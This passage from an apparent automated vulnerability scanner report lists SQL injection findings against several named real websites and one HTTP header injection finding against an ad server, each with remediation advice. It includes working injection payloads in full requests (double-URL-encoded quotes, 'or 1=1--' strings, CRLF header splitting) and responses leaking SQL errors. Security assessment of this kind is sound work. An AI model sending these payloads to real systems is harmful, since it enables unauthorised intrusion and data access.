The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the campaignId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468%2527&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:42 GMT
Expires: Mon, 14 Feb 2011 01:41:42 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQQTQBCC=DLBNDMJDNKIDNMDKPADJABFN; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468%27, @syndicationOutletId = 49160, @adro
...[SNIP]...

1.21. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the siteId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks, but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the siteId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55%2527&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:06 GMT
Expires: Mon, 14 Feb 2011 01:41:06 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSACDSAD=PMPJANJDAHGLDPAGNOMFKNLG; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55%27, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160, @adro
...[SNIP]...

1.22. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The syndicationOutletId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the syndicationOutletId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks, but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the syndicationOutletId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160%2527&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:27 GMT
Expires: Mon, 14 Feb 2011 01:41:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSACDSSTA=AHLNOCKDFBNKACKODKPLOBNG; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160%27, @adro
...[SNIP]...

1.23. http://www.desmoinesregister.com/odygel/lib/core/core.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.desmoinesregister.com
Path:   /odygel/lib/core/core.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 22520002'%20or%201%3d1--%20 and 22520002'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /odygel/lib/core22520002'%20or%201%3d1--%20/core.js HTTP/1.1
Host: www.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://www.desmoinesregister.com/scripts/app'%20and%201%3d1--%20/js/jquery-1.3.1.min.js?ver=3.0.4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A5H%2Cplacementid%3A1272947%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1272948/0/0/ADTECH%253Balias%253Dia-desmoines.desmoinesregister.com/news/opinion/blog/front.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D15892%253Bmisc%253D1297647421991%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1297665422

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Mon, 14 Feb 2011 15:10:46 GMT
X-Processing-begin: MOC-WN0516, on site D2 (2011-02-14 10:10:46:597)
Content-Type: text/html
X-Processing-finished: MOC-WN0516, on site D2 (2011-02-14 10:10:46:644)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 27910
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 15:10:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
                               <title> | The Des Moines Register | DesMoinesRegister.com
...[SNIP]...
<br>
Scripts: 32ms<br>

-->

Request 2

GET /odygel/lib/core22520002'%20or%201%3d2--%20/core.js HTTP/1.1
Host: www.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://www.desmoinesregister.com/scripts/app'%20and%201%3d1--%20/js/jquery-1.3.1.min.js?ver=3.0.4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A5H%2Cplacementid%3A1272947%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1272948/0/0/ADTECH%253Balias%253Dia-desmoines.desmoinesregister.com/news/opinion/blog/front.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D15892%253Bmisc%253D1297647421991%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1297665422

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Mon, 14 Feb 2011 15:10:46 GMT
X-Processing-begin: MOC-WN0516, on site D2 (2011-02-14 10:10:46:737)
Content-Type: text/html
X-Processing-finished: MOC-WN0516, on site D2 (2011-02-14 10:10:46:784)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 27932
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 15:10:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
                               <title> | The Des Moines Register | DesMoinesRegister.com
...[SNIP]...
<br>
Scripts: 15ms<br>
Read cache: 16ms<br>

-->

1.24. http://www.desmoinesregister.com/scripts/app/js/jquery-1.3.1.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.desmoinesregister.com
Path:   /scripts/app/js/jquery-1.3.1.min.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/app'%20and%201%3d1--%20/js/jquery-1.3.1.min.js?ver=3.0.4 HTTP/1.1
Host: www.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Mon, 14 Feb 2011 14:52:28 GMT
X-Processing-begin: MOC-WN0508, on site D2 (2011-02-14 09:52:28:366)
Content-Type: text/html
X-Processing-finished: MOC-WN0508, on site D2 (2011-02-14 09:52:28:412)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 27910
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 14:52:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
                               <title> | The Des Moines Register | DesMoinesRegister.com
...[SNIP]...
<!-- Delivery of Cache Page
Time used: 46 ms<br>
<b>Starting first parse</b><br>
.Build 9: 15 ms (Content)<br>
Retrieve categories: 0ms<br>
Read templates: 0ms<br>
Read objects: 0ms<br>
Scripts: 15ms<br>

-->

Request 2

GET /scripts/app'%20and%201%3d2--%20/js/jquery-1.3.1.min.js?ver=3.0.4 HTTP/1.1
Host: www.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Mon, 14 Feb 2011 14:52:28 GMT
X-Processing-begin: MOC-WN0509, on site D2 (2011-02-14 09:52:28:514)
Content-Type: text/html
X-Processing-finished: MOC-WN0509, on site D2 (2011-02-14 09:52:28:608)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 27923
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 14:52:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
                               <title> | The Des Moines Register | DesMoinesRegister.com
...[SNIP]...
<!-- Delivery of Cache Page
Time used: 78 ms Wait: 156 ms<br>
<b>Starting first parse</b><br>
.Build 9: 63 ms (Content)<br>
Retrieve categories: 0ms<br>
Read templates: 0ms<br>
Read objects: 0ms<br>
Scripts: 63ms<br>

-->

1.25. http://www.quantcast.com/global/personalHeader [qcVisitor cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.quantcast.com
Path:   /global/personalHeader

Issue detail

The qcVisitor cookie appears to be vulnerable to SQL injection attacks. The payloads 16652564'%20or%201%3d1--%20 and 16652564'%20or%201%3d2--%20 were each submitted in the qcVisitor cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /global/personalHeader HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; qcVisitor=2|77|1296918427290|62|NOTSET16652564'%20or%201%3d1--%20; JSESSIONID=6AC4FB85FB2136D92A4B98C360B3137C

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Mon, 14 Feb 2011 01:15:15 GMT
Expires: Sat, 12 Feb 2011 13:15:15 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=2|77|1296918427290|63|NOTSET16652564; Expires=Wed, 06-Feb-2041 01:15:15 GMT; Path=/
Set-Cookie: JSESSIONID=4DB3BC426F9AB4726E9FD03BE2E8638A; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 934
Connection: close









<span id="header-utility" class="utility">



<ul>
<li class="optout"><a id="searchFormOptOut" href="/opt-out">Opt-Out</a></li>
<li><a href="/privacy" class="privacy">Privacy</a></li>


<li>
<a id="globalNavSignIn" href="/user/login">
Sign In
</a>
</li>

<li class="last">
<a id="globalNavCreateAccount" href="/user/signup">Create Account</a>
</li>
</ul>



</span>
<!-- Mini login module -->




<div id="miniLogin">



<form id="signupLogin" name="userlogin" action="/user/login" method="post">
<table id="signupLoginTable">
<tr>
<td>



<label>Email</label>


<input id="email" name="wpUsername" size="15" class="loginText" type="text" spellcheck="false"/>
</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>



<label>Password</label>


<input id="password" name="wpPassword" class="loginText" type="password" value="" size="15"/>
</td>
<td><input type="submit" class="submit" value="Sign In" /></td>
</tr>
</table>
</form>


</div>



Request 2

GET /global/personalHeader HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; qcVisitor=2|77|1296918427290|62|NOTSET16652564'%20or%201%3d2--%20; JSESSIONID=6AC4FB85FB2136D92A4B98C360B3137C

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Mon, 14 Feb 2011 01:15:15 GMT
Expires: Sat, 12 Feb 2011 13:15:15 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=2|77|1296918427290|63|NOTSET16652564; Expires=Wed, 06-Feb-2041 01:15:15 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 934
Connection: close









<span id="header-utility" class="utility">



<ul>
<li class="optout"><a id="searchFormOptOut" href="/opt-out">Opt-Out</a></li>
<li><a href="/privacy" class="privacy">Privacy</a></li>


<li>
<a id="globalNavSignIn" href="/user/login">
Sign In
</a>
</li>

<li class="last">
<a id="globalNavCreateAccount" href="/user/signup">Create Account</a>
</li>
</ul>



</span>
<!-- Mini login module -->




<div id="miniLogin">



<form id="signupLogin" name="userlogin" action="/user/login" method="post">
<table id="signupLoginTable">
<tr>
<td>



<label>Email</label>


<input id="email" name="wpUsername" size="15" class="loginText" type="text" spellcheck="false"/>
</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>



<label>Password</label>


<input id="password" name="wpPassword" class="loginText" type="password" value="" size="15"/>
</td>
<td><input type="submit" class="submit" value="Sign In" /></td>
</tr>
</table>
</form>


</div>




1.26. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.webbyawards.com
Path:   /webbys/current_honorees.php

Issue detail

The media_id parameter appears to be vulnerable to SQL injection attacks. The payloads 11757037%20or%201%3d1--%20 and 11757037%20or%201%3d2--%20 were each submitted in the media_id parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /webbys/current_honorees.php?media_id=9611757037%20or%201%3d1--%20&category_id=61&season=13 HTTP/1.1
Host: www.webbyawards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 14:47:43 GMT
Server: Apache
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=7b324e13987363266d824018404c2afd; expires=Mon, 21-Feb-2011 14:47:43 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /webbys/current_honorees.php?media_id=9611757037%20or%201%3d2--%20&category_id=61&season=13 HTTP/1.1
Host: www.webbyawards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 14:48:18 GMT
Server: Apache
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=dafa34d404b3719f86b4df44da0b03b1; expires=Mon, 21-Feb-2011 14:48:18 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20652




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>Webby Honorees</title>

<link href="/css/screen.css" rel="stylesheet" type="text/css" media="screen" />
<!--[if lte IE 7]>
<link href="/css/screen-ie.css" rel="stylesheet" type="text/css" media="screen" />
<![endif]-->

<!--[if lte IE 6]>
<link href="/css/screen-ie6.css" rel="stylesheet" type="text/css" media="screen" />
<![endif]-->



<link rel="shortcut icon" href="/images/favicon.ico" >



<script language="javascript" type="text/javascript" src="/script/rotate_quote.js"></script>
<script language="javascript" type="text/javascript" src="/script/site_globals.js"></script>
<script language="javascript" type="text/javascript" src="/script/swfobject.js"></script>


<style type="text/css">
        #bottom{ display: block; height: 300px; width: 400px; z-index: 10000; }
       </style>
       <script type="text/javascript" src="/takeover/js/swfobject.js"></script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.js"></script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
       
       <!--for homepage carousel -->
       <script type="text/javascript" src="/index-slider/js/jquery.jcarousel.js"></script>
<script type="text/javascript" src="/index-slider/js/jquery.cycle.all.js"></script>
       <link rel="stylesheet" type="text/css" href="/index-slider/css/skin.css" />
       
       

    <script type="text/javascript">
    var flashvars = {
       };
       var params = {
       };
       var attributes = {
        wmode: "transparent"
       };
    swfobject.embedSWF("/takeover/media/webbys.swf", "myContent", "400", "300", "9.0.0", flashvars, params, attributes);
    $(document).ready(function(){
    $("#close-flash").hide();
    $("#close-flash").de
...[SNIP]...

2. HTTP header injection
There are 49 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c9c1%0d%0a579cb4ff136 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c9c1%0d%0a579cb4ff136;dc_pixel_url=resn.bfppixel;dc_seg=111918;ord=9544611894525588? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c9c1
579cb4ff136
;dc_pixel_url=resn.bfppixel;dc_seg=111918;ord=9544611894525588:
